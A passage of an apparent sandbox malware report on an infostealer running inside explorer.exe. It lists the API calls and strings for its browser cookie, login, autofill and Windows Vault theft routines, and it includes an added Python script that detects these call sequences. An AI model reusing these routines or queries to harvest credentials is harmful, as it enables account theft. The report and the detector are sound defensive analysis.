• RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0043383B
• RtlZeroMemory.NTDLL(?,00000040), ref: 00433870
• lstrlen.KERNEL32(?,?,?,?,?), ref: 0043398B
• lstrlen.KERNEL32(00000000), ref: 0043399A
• wsprintfA.USER32 ref: 004339F1
• lstrlen.KERNEL32(00000000,?,?), ref: 004339FD
• lstrcat.KERNEL32(00000000,?), ref: 00433A21
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00433A49
• lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00433B13
• lstrlen.KERNEL32(00000000), ref: 00433B22
• wsprintfA.USER32 ref: 00433B79
• lstrlen.KERNEL32(00000000), ref: 00433B85
• lstrcat.KERNEL32(00000000,?), ref: 00433BA9
• lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00433BDA
• DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00433C16
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
• String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
• API String ID: 584740257-404540950
• Opcode ID: a4704bf0a5f378ace2102f47440095f567c2b4a82f1af463ddeb2d8cba48db84
• Instruction ID: 4a1019d9b8e64eefd1f36e02d83f3393fb165fe123e2b8b145f72a99b4c5513d
• Opcode Fuzzy Hash: a4704bf0a5f378ace2102f47440095f567c2b4a82f1af463ddeb2d8cba48db84
• Instruction Fuzzy Hash: B4E1CD70208341AFD715EF25C884B2FBBE9AF89359F04582EF48587262DB39DD05CB5A

Control-flow Graph
• Function 00432198 (entry block 432198-4321c9 RtlZeroMemory GetVersionExW; exits through 43249b-4324a3): basic-block edge list and Executed / Not Executed colouring are graph-viewer residue and are omitted.
APIs
• RtlZeroMemory.NTDLL(?,00000114), ref: 004321AF
• GetVersionExW.KERNEL32(?), ref: 004321BE
• LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 004321E8
• GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0043220A
• GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00432214
• GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00432220
• GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0043222A
• GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00432236
• RtlCompareMemory.NTDLL(?,00491110,00000010), ref: 004322E8
• RtlCompareMemory.NTDLL(?,00491110,00000010), ref: 0043236C
  • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
  • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
  • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
  • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
• StrStrIW.SHLWAPI(?,Internet Explorer), ref: 004323FE
• FreeLibrary.KERNELBASE(00000000), ref: 00432493
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
• String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
• API String ID: 2583887280-2831467701
• Opcode ID: e5d3e767e1675982d8478db87371a402f9f6296ded96e45e98d94ae9a954a031
• Instruction ID: 2b70c0cdde8322ba86d4e9ca1c0f81224b390b0d3aae2b8a935526ab81f7eeed
• Opcode Fuzzy Hash: e5d3e767e1675982d8478db87371a402f9f6296ded96e45e98d94ae9a954a031
• Instruction Fuzzy Hash: 4491AC71A083419FD758DF65C984A2FBBE5AF9C704F00582EF98597261EBB8D801CB4A
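Added example (not Joe Sandbox output and not code recovered from the sample): a scan of a sandbox API trace for the two call sequences the API lists above document in the explorer.exe dump. The routine at 00433717 copies a browser database to %TEMP% (GetTempPathW, GetTempFileNameW, CopyFileW), runs the query string found in the dump (SELECT host_key,path,is_secure,name,encrypted_value FROM cookies), passes each encrypted_value that fails the 3-byte RtlCompareMemory prefix check to CryptUnprotectData, formats rows with %sTRUE%s%s%s%s%s (the TRUE/FALSE strings apparently carry is_secure), and deletes the copy. The routine at 00432198 loads vaultcli.dll, resolves VaultOpenVault / VaultEnumerateItems / VaultGetItem and matches vault names against "Internet Explorer". Both run in explorer.exe after injection, a process that does not normally touch vaultcli.dll or browser databases, so the ordered API sequence plus the process name is a usable hunting signature. The tab-separated trace line format, the sample trace, the 64-call window and the signature names are assumptions of this example; the constant compared by the 3-byte RtlCompareMemory is not shown in the report, so the scan does not depend on it.

```python
"""Scan a sandbox API trace for the credential-theft call sequences documented
in this report (cookie-database routine at 0x433717, vaultcli.dll routine at
0x432198).  Added example; not Joe Sandbox code and not the sample's code.
Assumed trace line format: "<pid>\t<process>\t<caller addr hex>\t<API>(<args>)".
"""
import re
from dataclasses import dataclass

LINE_RE = re.compile(r"^(\d+)\t([^\t]+)\t([0-9A-Fa-f]+)\t(\w+)\((.*)\)$")


@dataclass
class Call:
    pid: int
    process: str
    addr: int
    api: str
    args: str


def parse_trace(text):
    """Parse trace lines into Call records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            calls.append(Call(int(m[1]), m[2], int(m[3], 16), m[4], m[5]))
    return calls


# Each step is (API name, required substring of the argument list or None).
# Cookie steps follow the report's API list for 0x433717; vault steps follow
# the GetProcAddress chain for 0x432198.  Signature names are this example's.
SIGNATURES = {
    "browser_db_copy_dpapi_decrypt": [
        ("GetTempPathW", None),
        ("GetTempFileNameW", None),
        ("CopyFileW", None),
        ("CryptUnprotectData", None),
        ("DeleteFileW", None),
    ],
    "windows_vault_enum_vaultcli": [
        ("LoadLibraryW", "vaultcli.dll"),
        ("GetProcAddress", "VaultOpenVault"),
        ("GetProcAddress", "VaultEnumerateItems"),
        ("GetProcAddress", "VaultGetItem"),
        ("FreeLibrary", None),
    ],
}


def _step_matches(call, step):
    api, needle = step
    return call.api == api and (needle is None or needle in call.args)


def match_sequence(calls, steps, max_span=64):
    """Return (first_index, last_index) of the earliest ordered occurrence of
    `steps` within `max_span` consecutive calls, else None.  Ordered-subsequence
    matching tolerates the lstrlen / heap / wsprintfA calls interleaved between
    the steps in the real routine."""
    for start, first in enumerate(calls):
        if not _step_matches(first, steps[0]):
            continue
        idx, ok = start, True
        for step in steps[1:]:
            nxt = next((j for j in range(idx + 1, min(len(calls), start + max_span))
                        if _step_matches(calls[j], step)), None)
            if nxt is None:
                ok = False
                break
            idx = nxt
        if ok:
            return start, idx
    return None


def scan(trace_text):
    """Group calls per pid and return
    {signature: [(pid, process, first caller address, last caller address)]}."""
    per_pid = {}
    for c in parse_trace(trace_text):
        per_pid.setdefault(c.pid, []).append(c)
    hits = {}
    for pid, calls in per_pid.items():
        for name, steps in SIGNATURES.items():
            span = match_sequence(calls, steps)
            if span:
                a, b = span
                hits.setdefault(name, []).append((pid, calls[a].process, calls[a].addr, calls[b].addr))
    return hits


# Constructed trace (not sandbox output): pid 13 reproduces the call order and
# caller addresses from the report's API lists; pid 7 is a benign process that
# only copies a file to %TEMP% and must not match.
SAMPLE_TRACE = """\
13\texplorer.exe\t00433778\tGetTempPathW(00000104,00000000)
13\texplorer.exe\t00433782\tGetTempFileNameW(00000000,00000000,00000000,00000000)
13\texplorer.exe\t00433789\tDeleteFileW(00000000)
13\texplorer.exe\t00433794\tCopyFileW(?,00000000,00000000)
13\texplorer.exe\t0043383B\tRtlCompareMemory(00000000,?,00000003)
13\texplorer.exe\t00433A49\tCryptUnprotectData(?,00000000,00000000,00000000,00000000,00000001,?)
13\texplorer.exe\t00433B13\tlstrlen(?)
13\texplorer.exe\t00433BA9\tlstrcat(00000000,?)
13\texplorer.exe\t00433C16\tDeleteFileW(00000000,00000000,?)
13\texplorer.exe\t004321E8\tLoadLibraryW(vaultcli.dll)
13\texplorer.exe\t0043220A\tGetProcAddress(00000000,VaultOpenVault)
13\texplorer.exe\t00432214\tGetProcAddress(00000000,VaultCloseVault)
13\texplorer.exe\t00432220\tGetProcAddress(00000000,VaultEnumerateItems)
13\texplorer.exe\t0043222A\tGetProcAddress(00000000,VaultGetItem)
13\texplorer.exe\t00432236\tGetProcAddress(00000000,VaultFree)
13\texplorer.exe\t004323FE\tStrStrIW(?,Internet Explorer)
13\texplorer.exe\t00432493\tFreeLibrary(00000000)
7\tnotepad.exe\t00401000\tGetTempPathW(00000104,00000000)
7\tnotepad.exe\t00401010\tGetTempFileNameW(00000000,00000000,00000000,00000000)
7\tnotepad.exe\t00401020\tCopyFileW(?,00000000,00000000)
7\tnotepad.exe\t00401030\tDeleteFileW(00000000)
"""

if __name__ == "__main__":
    for sig, found in scan(SAMPLE_TRACE).items():
        for pid, proc, first, last in found:
            print(f"{sig}: pid {pid} ({proc}) callers {first:08x}..{last:08x}")
```

Browsers copy and DPAPI-decrypt their own databases, so the cookie signature on its own is only meaningful together with the calling process (here explorer.exe, which has no business doing this) or with the SQL query string from the String ID line present in the process memory; the vault signature is more specific because few processes resolve VaultEnumerateItems at run time.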

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 261 433098-4330b1 call 431b6a 264 4330b7-4330cd 261->264 265 4333ba-4333c0 261->265 266 4330e3-433128 call 431000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 484bec 264->266 267 4330cf-4330d8 call 43302d 264->267 274 43339b-4333a4 DeleteFileW call 431011 266->274 275 43312e-433146 call 46eeb8 266->275 270 4330dd-4330df 267->270 270->266 278 4333a9-4333ab 274->278 281 433392-433396 call 483848 275->281 282 43314c-433158 call 4502ec 275->282 278->265 280 4333ad-4333b5 call 432ffa 278->280 280->265 281->274 287 433389-43338d call 44fb92 282->287 288 43315e-433161 282->288 287->281 289 433165-43317f call 431fa7 288->289 293 433185-433196 289->293 294 43336f-43337b call 4502ec 289->294 295 4332cd-4332e7 CryptUnprotectData 293->295 296 43319c-4331ac RtlCompareMemory 293->296 294->289 303 433381-433385 294->303 295->294 298 4332ed-4332f2 295->298 296->295 299 4331b2-4331b4 296->299 298->294 301 4332f4-43330a call 431fa7 298->301 299->295 302 4331ba-4331bf 299->302 308 433318-43332f call 431fa7 301->308 309 43330c-433312 301->309 302->295 305 4331c5-4331ca 302->305 303->287 305->295 307 4331d0-433253 RtlZeroMemory call 431000 305->307 321 433255-43326b call 431fa7 307->321 322 4332bd 307->322 315 433331-433337 308->315 316 43333d-433343 308->316 309->308 311 433314 309->311 311->308 315->316 320 433339 315->320 318 433351-43336a call 431798 * 3 316->318 319 433345-43334b 316->319 318->294 319->318 324 43334d 319->324 320->316 330 433279-43328e call 431fa7 321->330 331 43326d-433273 321->331 323 4332c1-4332c8 call 431011 322->323 323->294 324->318 339 433290-433296 330->339 340 43329c-4332bb call 431798 * 3 330->340 331->330 334 433275 331->334 334->330 339->340 341 433298 339->341 340->323 341->340
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
                                                                                                                              • Part of subcall function 00431B6A: CloseHandle.KERNELBASE(00000000), ref: 00431B8F
                                                                                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 004330F9
                                                                                                                            • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00433103
                                                                                                                            • DeleteFileW.KERNELBASE(00000000), ref: 0043310A
                                                                                                                            • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00433115
                                                                                                                            • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 004331A4
                                                                                                                            • RtlZeroMemory.NTDLL(?,00000040), ref: 004331D7
                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004332DF
                                                                                                                            • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0043339C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                            • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                                            • API String ID: 2757140130-4052020286

                                                                                                                            Control-flow Graph
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 00433F0A
                                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00433F16
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862CC), ref: 00433F38
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862D0), ref: 00433F4C
                                                                                                                            • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00433F69
                                                                                                                            • lstrcmpiW.KERNEL32(?,Local State), ref: 00433F7E
                                                                                                                            • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00433F9B
                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00433FB5
                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00433FC4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                                            • String ID: *.*$Local State
                                                                                                                            • API String ID: 3923353463-3324723383

                                                                                                                            Control-flow Graph
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 00432B3D
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862CC), ref: 00432B63
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862D0), ref: 00432B7B
                                                                                                                              • Part of subcall function 004319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00432CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 004319C4
                                                                                                                            • StrStrIW.SHLWAPI(00000000,logins.json), ref: 00432BE7
                                                                                                                            • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00432C16
                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00432C43
                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00432C52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                                            • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                                            • API String ID: 1108783765-3717368146

                                                                                                                            Control-flow Graph
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004319B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00432CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 004319C4
                                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00431DA9
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862CC), ref: 00431DCF
                                                                                                                            • lstrcmpiW.KERNEL32(?,004862D0), ref: 00431DE7
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00431E62
                                                                                                                              • Part of subcall function 00431CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00432C27), ref: 00431D02
                                                                                                                              • Part of subcall function 00431CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00431D0D
                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00431E94
                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00431EA3
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                              • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
                                                                                                                              • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                            • String ID: *.*$\*.*
                                                                                                                            • API String ID: 232625764-1692270452

                                                                                                                            Control-flow Graph
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
                                                                                                                              • Part of subcall function 00431B6A: CloseHandle.KERNELBASE(00000000), ref: 00431B8F
                                                                                                                              • Part of subcall function 00431C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00433E1E,00000000,?,00433FA8), ref: 00431C46
                                                                                                                              • Part of subcall function 00431C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00433FA8), ref: 00431C56
                                                                                                                              • Part of subcall function 00431C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00433FA8), ref: 00431C76
                                                                                                                              • Part of subcall function 00431C31: CloseHandle.KERNEL32(00000000,?,00433FA8), ref: 00431C91
                                                                                                                              • Part of subcall function 00432FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00433E30,00000000,00000000,?,00433FA8), ref: 00432FC1
                                                                                                                              • Part of subcall function 00432FB1: lstrlen.KERNEL32("encrypted_key":",?,00433FA8), ref: 00432FCE
                                                                                                                              • Part of subcall function 00432FB1: StrStrIA.SHLWAPI("encrypted_key":",0048692C,?,00433FA8), ref: 00432FDD
                                                                                                                              • Part of subcall function 0043123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00433E4B,00000000), ref: 0043124A
                                                                                                                              • Part of subcall function 0043123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00431268
                                                                                                                              • Part of subcall function 0043123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00431295
                                                                                                                            • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00433E74
                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00433E9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                            • String ID: $DPAP$DPAP$IDPAP
                                                                                                                            • API String ID: 3076719866-957854035
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0043116F
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00434BB6
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00434BBF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1675517319-0
                                                                                                                            APIs
                                                                                                                            • GetSystemInfo.KERNELBASE(004920A4,00000001,00000000,0000000A,00483127,004328DA,00000000,?), ref: 0043BFFC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 31276548-0
                                                                                                                            • Opcode ID: 4b182b3c74395a3ba507cb3b62a102b8e6aaa7796a0fa1e8dceb7d81ed9db1a5
                                                                                                                            • Instruction ID: b7d16b539208ed4488a91efc5582298ffc07980ae27fc346125a67ac0917f8c6
                                                                                                                            • Opcode Fuzzy Hash: 4b182b3c74395a3ba507cb3b62a102b8e6aaa7796a0fa1e8dceb7d81ed9db1a5
                                                                                                                            • Instruction Fuzzy Hash: 82E0ED3178430275EA1437BA7D07F1A19494B8DB04F61EA3BB710AA1EADB9D9141102E

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
                                                                                                                              • Part of subcall function 00431B6A: CloseHandle.KERNELBASE(00000000), ref: 00431B8F
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 00433C6A
                                                                                                                            • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00433C76
                                                                                                                            • DeleteFileW.KERNELBASE(00000000), ref: 00433C7D
                                                                                                                            • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00433C89
                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00433D2F
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00433D36
                                                                                                                            • wsprintfA.USER32 ref: 00433D55
                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00433D61
                                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 00433D89
                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00433DB2
                                                                                                                            • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00433DED
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                            • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                            • API String ID: 2923052733-3488123210
                                                                                                                            • Opcode ID: 96b1fca0ed9d498312dd552b045496cc6cf07b330028b29c6767e20485dce176
                                                                                                                            • Instruction ID: a82415301a97074fd923797ba43989cf1c4a4a629178f12ee63a6563f569790d
                                                                                                                            • Opcode Fuzzy Hash: 96b1fca0ed9d498312dd552b045496cc6cf07b330028b29c6767e20485dce176
                                                                                                                            • Instruction Fuzzy Hash: 6741D330204201ABD714BF75CC85E3F76A9EF89749F00182EF845A7262DB3DDD01876A

Control-flow Graph

APIs
• DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00432AD2
  • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
  • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
• lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 004329E1
• lstrlen.KERNEL32(00000000), ref: 004329EC
• wsprintfA.USER32 ref: 00432A38
• lstrlen.KERNEL32(00000000), ref: 00432A44
• lstrcat.KERNEL32(00000000,00000000), ref: 00432A6C
• lstrlen.KERNEL32(00000000,?,?), ref: 00432A99
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
• String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
• API String ID: 304071051-2605711689
• Opcode ID: 3ee07d16000734c23d43e1b2b02ba24af01e8efd0ec79fc15e3a3c056ef7b255
• Instruction ID: affb394bf665f759dd65e57abefbdacb19f60197a20edc743272e863678be094
• Opcode Fuzzy Hash: 3ee07d16000734c23d43e1b2b02ba24af01e8efd0ec79fc15e3a3c056ef7b255
• Instruction Fuzzy Hash: 6B51AE706043468BD725EF219990B3F77E9AF89308F04582EF8859B262DB7DDC058B5A

Control-flow Graph

APIs
  • Part of subcall function 00431953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
  • Part of subcall function 00431953: lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
  • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
  • Part of subcall function 00431953: lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
  • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
  • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
  • Part of subcall function 00431B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00432893,00000000,00000000,00000000,?), ref: 00431B82
  • Part of subcall function 00431B6A: CloseHandle.KERNELBASE(00000000), ref: 00431B8F
• GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00432D13
• StrStrIW.SHLWAPI(00000000,Profile), ref: 00432D45
• GetPrivateProfileStringW.KERNEL32(00000000,Path,0048637C,?,00000FFF,?), ref: 00432D68
• GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00432D7B
• lstrlenW.KERNEL32(00000000), ref: 00432DD8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
• String ID: IsRelative$Path$Profile$profiles.ini
• API String ID: 2234428054-4107377610
• Opcode ID: 3dc251deddff9da3afe2cca044a6669ae09452c39fb299b406b5ec23eb02ef43
• Instruction ID: fc31e920b34436885553947df72526934025fb3b63be5925a88d4c0822bc2bbc
• Opcode Fuzzy Hash: 3dc251deddff9da3afe2cca044a6669ae09452c39fb299b406b5ec23eb02ef43
• Instruction Fuzzy Hash: 643190307043019BCA54BF31991162F76A2AFCD704F10583FF946A7392DBBD8C46975A

Control-flow Graph

APIs
  • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
